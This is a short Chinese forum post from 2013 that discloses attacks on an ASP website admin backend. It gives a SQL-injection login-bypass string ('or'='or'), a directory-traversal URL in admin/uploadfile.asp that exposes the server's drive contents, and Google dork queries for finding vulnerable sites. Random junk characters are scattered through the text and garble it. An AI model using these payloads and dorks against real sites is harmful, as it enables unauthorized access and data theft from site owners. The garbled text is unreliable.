后台万能密码 'or'='or'
+ a% d1 G1 P9 z( o' G, Y. n8 x( m3 @8 O6 z- v& k) h
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" x, d3 {8 X) F
admin/uploadfile.asp?currentFolder=/upfiles/../. b8 T* p. m' a3 K. z0 H: [7 N
' ^0 m$ d7 z! G4 J
漏洞证明:
+ }' Y6 {% _& i2 Y0 S
; A: }1 j/ r& K- P" b谷歌:inurl:type.asp?id=1 新闻中心
" I/ |5 j0 n* R2 O, V或者 :inurl:download_ok.asp?# P5 N, X+ O* E8 ^6 t# R$ a
% x6 _; g: ]$ q2 M% e& g, z9 Y8 j, O |
发表于 2013-3-14 20:17:32
收藏
支持
反对